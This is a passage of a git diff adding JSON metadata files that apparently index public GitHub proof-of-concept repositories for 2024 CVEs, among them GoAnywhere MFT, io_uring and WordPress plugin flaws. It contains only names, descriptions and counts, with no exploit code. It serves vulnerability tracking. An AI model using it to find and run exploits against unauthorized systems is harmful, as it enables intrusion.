"full_name": "gh-ost00\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-0195-SpiderFlow", + "description": "CVE-2024-0195 Improper Control of Generation of Code ('Code Injection')", + "fork": false, + "created_at": "2024-08-31T07:37:55Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-08-31T07:46:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851171964, + "name": "CVE-2024-0195-SpiderFlow", + "full_name": "MuhammadWaseem29\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/CVE-2024-0195-SpiderFlow", + "description": null, + "fork": false, + "created_at": "2024-09-02T15:01:15Z", + "updated_at": "2024-10-16T17:19:47Z", + "pushed_at": "2024-09-05T13:30:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853646582, + "name": "CVE-2024-0195-SpiderFlow", + "full_name": "hack-with-rohit\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "hack-with-rohit", + "id": 162045216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162045216?v=4", + "html_url": "https:\/\/github.com\/hack-with-rohit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hack-with-rohit\/CVE-2024-0195-SpiderFlow", + "description": null, + "fork": false, + "created_at": "2024-09-07T06:01:29Z", + "updated_at": "2024-09-07T06:03:43Z", + "pushed_at": "2024-09-07T06:03:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0197.json b/2024/CVE-2024-0197.json new file mode 100644 index 0000000000..de1c47fcac --- /dev/null +++ b/2024/CVE-2024-0197.json @@ -0,0 +1,33 @@ +[ + { + "id": 764157453, + "name": "CVE-2024-0197-POC", + "full_name": "ewilded\/CVE-2024-0197-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-0197-POC", + "description": "Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.", + "fork": false, + "created_at": "2024-02-27T15:25:58Z", + "updated_at": "2024-04-04T00:15:46Z", + "pushed_at": "2024-02-27T15:30:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0204.json b/2024/CVE-2024-0204.json new file mode 100644 index 0000000000..243518fc1c --- /dev/null +++ b/2024/CVE-2024-0204.json @@ -0,0 +1,126 @@ +[ + { + "id": 747380799, + "name": "CVE-2024-0204", + "full_name": "horizon3ai\/CVE-2024-0204", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-0204", + "description": "Authentication Bypass in GoAnywhere MFT", + "fork": false, + "created_at": "2024-01-23T20:16:14Z", + "updated_at": "2024-10-13T00:34:35Z", + "pushed_at": "2024-01-23T20:33:30Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 64, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 747426521, + "name": "CVE-2024-0204", + "full_name": "cbeek-r7\/CVE-2024-0204", + "owner": { + "login": "cbeek-r7", + "id": 117099647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4", + "html_url": "https:\/\/github.com\/cbeek-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2024-0204", + "description": "Scanning for vulnerable GoAnywhere MFT CVE-2024-0204", + "fork": false, + "created_at": "2024-01-23T22:42:58Z", + "updated_at": "2024-02-19T06:58:12Z", + "pushed_at": "2024-01-23T22:44:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747873972, + "name": "CVE-2024-0204", + "full_name": "m-cetin\/CVE-2024-0204", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-0204", + "description": "This script exploits the CVE-2024-0204 vulnerability in Fortra GoAnywhere MFT, allowing the creation of unauthorized administrative users, for educational and authorized testing purposes.", + "fork": false, + "created_at": "2024-01-24T20:10:34Z", + "updated_at": "2024-04-05T14:01:39Z", + "pushed_at": "2024-01-24T20:17:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752489740, + "name": "CVE-2024-0204", + "full_name": "adminlove520\/CVE-2024-0204", + "owner": { + "login": "adminlove520", + "id": 32920883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4", + "html_url": "https:\/\/github.com\/adminlove520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adminlove520\/CVE-2024-0204", + "description": "GoAnywhere MFT", + "fork": false, + "created_at": "2024-02-04T01:40:46Z", + "updated_at": "2024-02-04T01:43:55Z", + "pushed_at": "2024-02-04T01:43:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0230.json b/2024/CVE-2024-0230.json new file mode 100644 index 0000000000..570a3aba08 --- /dev/null +++ b/2024/CVE-2024-0230.json @@ -0,0 +1,33 @@ +[ + { + "id": 804066469, + "name": "cve-2024-0230-blue", + "full_name": "keldnorman\/cve-2024-0230-blue", + "owner": { + "login": "keldnorman", + "id": 10332862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10332862?v=4", + "html_url": "https:\/\/github.com\/keldnorman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keldnorman\/cve-2024-0230-blue", + "description": "Helper script to POC of CVE-2024-0230 Bluetooth", + "fork": false, + "created_at": "2024-05-21T22:23:57Z", + "updated_at": "2024-11-18T07:23:30Z", + "pushed_at": "2024-05-22T20:34:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0235.json b/2024/CVE-2024-0235.json new file mode 100644 index 0000000000..509d0f794d --- /dev/null +++ b/2024/CVE-2024-0235.json @@ -0,0 +1,45 @@ +[ + { + "id": 809827626, + "name": "CVE-2024-0235", + "full_name": "Cappricio-Securities\/CVE-2024-0235", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0235", + "description": "EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure", + "fork": false, + "created_at": "2024-06-03T14:21:48Z", + "updated_at": "2024-06-24T10:19:50Z", + "pushed_at": "2024-06-24T10:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-0235", + "cve-2024-0235-exploit", + "cve-2024-0235-poc", + "cve-2024-0235-scanner", + "eventon-scanner", + "information-disclosure", + "wordpress-scanner", + "wpscan" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0305.json b/2024/CVE-2024-0305.json new file mode 100644 index 0000000000..efce228f8e --- /dev/null +++ b/2024/CVE-2024-0305.json @@ -0,0 +1,33 @@ +[ + { + "id": 788238757, + "name": "cve-2024-0305exp", + "full_name": "jidle123\/cve-2024-0305exp", + "owner": { + "login": "jidle123", + "id": 123531867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123531867?v=4", + "html_url": "https:\/\/github.com\/jidle123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jidle123\/cve-2024-0305exp", + "description": "cve-2024-0305可用的exp", + "fork": false, + "created_at": "2024-04-18T03:13:43Z", + "updated_at": "2024-04-30T12:00:02Z", + "pushed_at": "2024-04-19T04:23:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0311.json b/2024/CVE-2024-0311.json new file mode 100644 index 0000000000..8778bea183 --- /dev/null +++ b/2024/CVE-2024-0311.json @@ -0,0 +1,33 @@ +[ + { + "id": 880277050, + "name": "CVE-2024-0311", + "full_name": "calligraf0\/CVE-2024-0311", + "owner": { + "login": "calligraf0", + "id": 115566010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115566010?v=4", + "html_url": "https:\/\/github.com\/calligraf0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/calligraf0\/CVE-2024-0311", + "description": "Exploit for CVE-2024-0311", + "fork": false, + "created_at": "2024-10-29T12:47:18Z", + "updated_at": "2024-11-12T08:37:44Z", + "pushed_at": "2024-10-30T16:07:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0324.json b/2024/CVE-2024-0324.json new file mode 100644 index 0000000000..f977e52d37 --- /dev/null +++ b/2024/CVE-2024-0324.json @@ -0,0 +1,33 @@ +[ + { + "id": 737888624, + "name": "CVE-2024-0324", + "full_name": "kodaichodai\/CVE-2024-0324", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0324", + "description": "a PoC for CVE-2024-0324\/WP Plugin - Profile Builder (<= 3.10.8)", + "fork": false, + "created_at": "2024-01-01T21:22:13Z", + "updated_at": "2024-09-11T05:42:48Z", + "pushed_at": "2024-09-10T16:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0352.json b/2024/CVE-2024-0352.json new file mode 100644 index 0000000000..92be2e7a09 --- /dev/null +++ b/2024/CVE-2024-0352.json @@ -0,0 +1,40 @@ +[ + { + "id": 814077972, + "name": "CVE-2024-0352", + "full_name": "Cappricio-Securities\/CVE-2024-0352", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0352", + "description": "Likeshop < 2.5.7.20210311 - Arbitrary File Upload", + "fork": false, + "created_at": "2024-06-12T09:46:26Z", + "updated_at": "2024-06-24T11:05:53Z", + "pushed_at": "2024-06-24T11:04:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-0352", + "pentesting", + "rce", + "vulnerability", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0379.json b/2024/CVE-2024-0379.json new file mode 100644 index 0000000000..e1a2a650ba --- /dev/null +++ b/2024/CVE-2024-0379.json @@ -0,0 +1,33 @@ +[ + { + "id": 855575005, + "name": "CVE-2024-0379", + "full_name": "kodaichodai\/CVE-2024-0379", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0379", + "description": "a PoC for CVE-2024-0379\/WP Plugin - Custom Twitter Feeds - A Tweets Widget or X Feed Widget (<= 2.2.1)", + "fork": false, + "created_at": "2024-09-11T05:12:47Z", + "updated_at": "2024-09-11T05:43:38Z", + "pushed_at": "2024-09-11T05:34:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0399.json b/2024/CVE-2024-0399.json new file mode 100644 index 0000000000..a722642f00 --- /dev/null +++ b/2024/CVE-2024-0399.json @@ -0,0 +1,33 @@ +[ + { + "id": 798415736, + "name": "CVE-2024-0399", + "full_name": "xbz0n\/CVE-2024-0399", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0399", + "description": null, + "fork": false, + "created_at": "2024-05-09T18:21:42Z", + "updated_at": "2024-05-09T18:24:59Z", + "pushed_at": "2024-05-09T18:24:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0507.json b/2024/CVE-2024-0507.json new file mode 100644 index 0000000000..08a7cf2fce --- /dev/null +++ b/2024/CVE-2024-0507.json @@ -0,0 +1,33 @@ +[ + { + "id": 773594791, + "name": "CVE-2024-0507_CVE-2024-0200-github", + "full_name": "convisolabs\/CVE-2024-0507_CVE-2024-0200-github", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2024-0507_CVE-2024-0200-github", + "description": "Exploits for GitHub Enterprise CVE-2024-0507 and CVE-2024-0200", + "fork": false, + "created_at": "2024-03-18T03:19:14Z", + "updated_at": "2024-09-05T14:32:14Z", + "pushed_at": "2024-09-05T14:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0509.json b/2024/CVE-2024-0509.json new file mode 100644 index 0000000000..92f9b1f3b5 --- /dev/null +++ b/2024/CVE-2024-0509.json @@ -0,0 +1,33 @@ +[ + { + "id": 855572557, + "name": "CVE-2024-0509", + "full_name": "kodaichodai\/CVE-2024-0509", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0509", + "description": "a PoC for CVE-2024-0509\/WP Plugin - WP 404 Auto Redirect to Similar Post (<= 5.4.14)", + "fork": false, + "created_at": "2024-09-11T05:05:05Z", + "updated_at": "2024-09-11T05:43:17Z", + "pushed_at": "2024-09-11T05:30:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0566.json b/2024/CVE-2024-0566.json new file mode 100644 index 0000000000..50fa6864f5 --- /dev/null +++ b/2024/CVE-2024-0566.json @@ -0,0 +1,33 @@ +[ + { + "id": 798394582, + "name": "CVE-2024-0566", + "full_name": "xbz0n\/CVE-2024-0566", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0566", + "description": null, + "fork": false, + "created_at": "2024-05-09T17:30:24Z", + "updated_at": "2024-05-09T17:35:02Z", + "pushed_at": "2024-05-09T17:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0582.json b/2024/CVE-2024-0582.json new file mode 100644 index 0000000000..ab1331439b --- /dev/null +++ b/2024/CVE-2024-0582.json @@ -0,0 +1,140 @@ +[ + { + "id": 779314046, + "name": "io_uring_LPE-CVE-2024-0582", + "full_name": "ysanatomic\/io_uring_LPE-CVE-2024-0582", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2024-0582", + "description": "LPE exploit for CVE-2024-0582 (io_uring)", + "fork": false, + "created_at": "2024-03-29T14:45:22Z", + "updated_at": "2024-11-21T09:29:02Z", + "pushed_at": "2024-03-29T16:05:31Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 93, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 782584156, + "name": "CVE-2024-0582", + "full_name": "Forsaken0129\/CVE-2024-0582", + "owner": { + "login": "Forsaken0129", + "id": 37268525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37268525?v=4", + "html_url": "https:\/\/github.com\/Forsaken0129", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Forsaken0129\/CVE-2024-0582", + "description": null, + "fork": false, + "created_at": "2024-04-05T15:39:48Z", + "updated_at": "2024-04-05T15:39:48Z", + "pushed_at": "2024-04-05T17:32:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806818257, + "name": "cve-2024-0582", + "full_name": "0ptyx\/cve-2024-0582", + "owner": { + "login": "0ptyx", + "id": 88157475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88157475?v=4", + "html_url": "https:\/\/github.com\/0ptyx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0ptyx\/cve-2024-0582", + "description": null, + "fork": false, + "created_at": "2024-05-28T01:06:48Z", + "updated_at": "2024-05-28T11:15:05Z", + "pushed_at": "2024-05-28T11:15:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866966019, + "name": "CVE-2024-0582", + "full_name": "geniuszlyy\/CVE-2024-0582", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-0582", + "description": "is a PoC exploit targeting a specific vulnerability in the Linux kernel (CVE-2024-0582)", + "fork": false, + "created_at": "2024-10-03T07:56:36Z", + "updated_at": "2024-10-21T08:15:18Z", + "pushed_at": "2024-10-03T07:58:47Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-0582", + "ethical-hacking", + "exploit", + "exploit-development", + "iouring", + "iouring-exploit", + "poc", + "security", + "vuln", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0588.json b/2024/CVE-2024-0588.json new file mode 100644 index 0000000000..0258ba50c7 --- /dev/null +++ b/2024/CVE-2024-0588.json @@ -0,0 +1,33 @@ +[ + { + "id": 855575621, + "name": "CVE-2024-0588", + "full_name": "kodaichodai\/CVE-2024-0588", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0588", + "description": "a PoC for CVE-2024-0588\/WP Plugin - Paid Memberships Pro (<= 2.12.7)", + "fork": false, + "created_at": "2024-09-11T05:14:59Z", + "updated_at": "2024-09-11T05:44:12Z", + "pushed_at": "2024-09-11T05:31:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0590.json b/2024/CVE-2024-0590.json new file mode 100644 index 0000000000..6f386e287b --- /dev/null +++ b/2024/CVE-2024-0590.json @@ -0,0 +1,33 @@ +[ + { + "id": 855576401, + "name": "CVE-2024-0590", + "full_name": "kodaichodai\/CVE-2024-0590", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0590", + "description": "a PoC for CVE-2024-0590\/WP Plugin - Microsoft Clarity (<= 0.9.3)", + "fork": false, + "created_at": "2024-09-11T05:17:20Z", + "updated_at": "2024-09-11T05:44:41Z", + "pushed_at": "2024-09-11T05:34:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0623.json b/2024/CVE-2024-0623.json new file mode 100644 index 0000000000..118075f051 --- /dev/null +++ b/2024/CVE-2024-0623.json @@ -0,0 +1,33 @@ +[ + { + "id": 855576963, + "name": "CVE-2024-0623", + "full_name": "kodaichodai\/CVE-2024-0623", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0623", + "description": "a PoC for CVE-2024-0623\/WP Plugin - VK Block Patterns (<= 1.31.1.1)", + "fork": false, + "created_at": "2024-09-11T05:19:13Z", + "updated_at": "2024-09-11T05:45:15Z", + "pushed_at": "2024-09-11T05:32:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0624.json b/2024/CVE-2024-0624.json new file mode 100644 index 0000000000..95c5e2f843 --- /dev/null +++ b/2024/CVE-2024-0624.json @@ -0,0 +1,33 @@ +[ + { + "id": 855577397, + "name": "CVE-2024-0624", + "full_name": "kodaichodai\/CVE-2024-0624", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0624", + "description": "a PoC for CVE-2024-0624\/WP Plugin - Paid Memberships Pro (<= 2.12.7)", + "fork": false, + "created_at": "2024-09-11T05:20:41Z", + "updated_at": "2024-09-11T05:45:43Z", + "pushed_at": "2024-09-11T05:33:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0679.json b/2024/CVE-2024-0679.json new file mode 100644 index 0000000000..ca712df131 --- /dev/null +++ b/2024/CVE-2024-0679.json @@ -0,0 +1,37 @@ +[ + { + "id": 745696785, + "name": "CVE-2024-0679", + "full_name": "RandomRobbieBF\/CVE-2024-0679", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-0679", + "description": "ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-01-19T22:30:51Z", + "updated_at": "2024-07-11T16:39:20Z", + "pushed_at": "2024-01-19T22:36:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0679", + "exploit", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0684.json b/2024/CVE-2024-0684.json new file mode 100644 index 0000000000..7523ed6bcd --- /dev/null +++ b/2024/CVE-2024-0684.json @@ -0,0 +1,37 @@ +[ + { + "id": 731901174, + "name": "writeup_split", + "full_name": "Valentin-Metz\/writeup_split", + "owner": { + "login": "Valentin-Metz", + "id": 31850924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31850924?v=4", + "html_url": "https:\/\/github.com\/Valentin-Metz", + "user_view_type": "public" + }, + "html_url": 